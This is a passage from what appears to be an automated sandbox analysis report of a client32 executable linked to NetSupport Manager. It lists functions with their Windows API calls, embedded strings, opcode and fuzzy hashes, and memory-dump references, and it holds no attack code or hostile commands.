                                                                                  • Opcode Fuzzy Hash: 3f5b2276da03322f2c0effce7b3b564e392dbc3a3c940142a110668279eae6c1
                                                                                  • Instruction Fuzzy Hash: 9B611475E04285AFE701CF64C480FAABBF6FB05314F0485A9E8959B2C1E774E985CBA4
                                                                                  Function 110935A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                    • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                    • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                    • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                    • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 110935E9
                                                                                  • SetWindowLongA.USER32(?,000000EC,00000000), ref: 11093617
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 11093640
                                                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109366E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 3136964118-2830328467
                                                                                  • Opcode ID: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
                                                                                  • Instruction ID: a6255a4dd11f96cfd194679b8cc3cdd2b3575d4c8ce1213ed658c40333833496
                                                                                  • Opcode Fuzzy Hash: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
                                                                                  • Instruction Fuzzy Hash: 1431E4B5A04615ABCB14DF65DC81F9BB3E5AB8C318F10862DF56A973D0DB34B840CB98
                                                                                  Function 110ED7B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,?), ref: 110ED801
                                                                                  • _free.LIBCMT ref: 110ED81C
                                                                                    • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                    • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                  • _malloc.LIBCMT ref: 110ED82E
                                                                                  • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110ED85A
                                                                                  • _free.LIBCMT ref: 110ED8E3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: QueryValue_free$ErrorFreeHeapLast_malloc
                                                                                  • String ID: Error %d getting %s
                                                                                  • API String ID: 582965682-2709163689
                                                                                  • Opcode ID: 4b19a493165c69821216a9cf770e163d849a3648b016c58b16d16473fa7c737d
                                                                                  • Instruction ID: 02eced05e3356085969bcbe05084d5abf0c2b7b1903d0388d20c61e7be7eac91
                                                                                  • Opcode Fuzzy Hash: 4b19a493165c69821216a9cf770e163d849a3648b016c58b16d16473fa7c737d
                                                                                  • Instruction Fuzzy Hash: F1318375D001289BDB60DA59CD84BEEB7F9EF54314F0481E9E88DA7240DE706E89CBD1
                                                                                  Function 1103D0E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80synchronizationwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                    • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,762323A0,1100BF7B), ref: 11110928
                                                                                    • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                  • WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
                                                                                  • SetPriorityClass.KERNEL32(?,?), ref: 1103D167
                                                                                  • IsWindow.USER32(?), ref: 1103D17E
                                                                                  • SendMessageA.USER32(?,0000004A,0006040E,00000492), ref: 1103D1B8
                                                                                  • _free.LIBCMT ref: 1103D1BF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
                                                                                  • String ID: Show16
                                                                                  • API String ID: 625148989-2844191965
                                                                                  • Opcode ID: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                                  • Instruction ID: 63bdf3f47677d5a3c66ccb25ed14d3d2c42581b640399fe0720dd9fbd5d3b219
                                                                                  • Opcode Fuzzy Hash: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                                  • Instruction Fuzzy Hash: 3B3182B5E10346AFD715DFA4C8849AFF7F9BB84309F40496DE56A97244DB70BA00CB81
                                                                                  Function 11009620 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 110D1540: wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110096D6
                                                                                  • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 110096EB
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009659
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009688, 110096B0
                                                                                  • IsA(), xrefs: 1100968D, 110096B5
                                                                                  • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 110096E5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                  • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                  • API String ID: 863766397-389219706
                                                                                  • Opcode ID: 6cba4906e97f348ea097e0d93425011368abffb83af317fd01dd9cb46dfc5e94
                                                                                  • Instruction ID: c29ccd5437a1998bdc0500c50b26c338a4961a37ea6a19b2fc580a4c00e0eec9
                                                                                  • Opcode Fuzzy Hash: 6cba4906e97f348ea097e0d93425011368abffb83af317fd01dd9cb46dfc5e94
                                                                                  • Instruction Fuzzy Hash: 5A215E75A00219ABDB00DFD5DC41FEEF3B8FF59654F10025AE922B7280EB746504CBA1
                                                                                  Function 110ED020 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsWindow.USER32(0000070B), ref: 110ED02A
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
                                                                                  • SetCursor.USER32(00000000), ref: 110ED0B8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
                                                                                  • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                                  • API String ID: 2735369351-763374134
                                                                                  • Opcode ID: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                                  • Instruction ID: 1517011758136c5ff836e71d92dda8c4c85f8f681a38b9b7789002e2c31f8d4e
                                                                                  • Opcode Fuzzy Hash: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                                  • Instruction Fuzzy Hash: 2F01497AE412253BD511A5537C0AFDFBB1CEF412ADF040031FD1996201F66AB11583E6
                                                                                  Function 110056A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetClientRect.USER32(00000000,?), ref: 110056DD
                                                                                  • BeginPaint.USER32(?,?), ref: 110056E8
                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100570A
                                                                                  • EndPaint.USER32(?,?), ref: 1100572F
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110056C3
                                                                                  • m_hWnd, xrefs: 110056C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 1216912278-2830328467
                                                                                  • Opcode ID: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
                                                                                  • Instruction ID: 646bbc1308694ba02cb50681d3c8309cd3c635e6896d205317d73ea189e6e8a3
                                                                                  • Opcode Fuzzy Hash: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
                                                                                  • Instruction Fuzzy Hash: FA1194B5A40219BFD714CBA0CD85FBEB3BCEB88709F104569F51796584DBB0A904C764
                                                                                  Function 110B94B0 Relevance: 10.6, APIs: 7, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32(76937AA0,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B94C7
                                                                                  • GetCursorPos.USER32(110C032C), ref: 110B94D6
                                                                                    • Part of subcall function 1115F5B0: GetWindowRect.USER32(?,?), ref: 1115F5CC
                                                                                  • PtInRect.USER32(110C032C,110C032C,110C032C), ref: 110B94F4
                                                                                  • ClientToScreen.USER32(?,110C032C), ref: 110B9516
                                                                                  • SetCursorPos.USER32(110C032C,110C032C,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9524
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 110B9531
                                                                                  • SetCursor.USER32(00000000,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9538
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Cursor$RectWindow$ClientForegroundLoadScreen
                                                                                  • String ID:
                                                                                  • API String ID: 3235510773-0
                                                                                  • Opcode ID: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
                                                                                  • Instruction ID: e413c7048e2c9fc99527a8bfd6ed1c185ebac442807b3b09d80bd78fd45dd6ba
                                                                                  • Opcode Fuzzy Hash: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
                                                                                  • Instruction Fuzzy Hash: A8115B72A4020E9BDB18DFA4C984DAFF7BCFB48215B004569E52297644DB34E906CBA4
                                                                                  Function 1100B340 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 1100B350
                                                                                  • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
                                                                                  • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8
                                                                                    • Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                    • Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
                                                                                    • Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
                                                                                    • Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                                    • Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                                  • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BF9B,?,00000000,00000002), ref: 1100B3B8
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
                                                                                  • _free.LIBCMT ref: 1100B3C8
                                                                                  • _free.LIBCMT ref: 1100B3CE
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                  • String ID:
                                                                                  • API String ID: 705253285-0
                                                                                  • Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                  • Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
                                                                                  • Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                  • Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64
                                                                                  Function 11079270 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InvalidateRect.USER32(00000000,00000000,00000000), ref: 110792EF
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
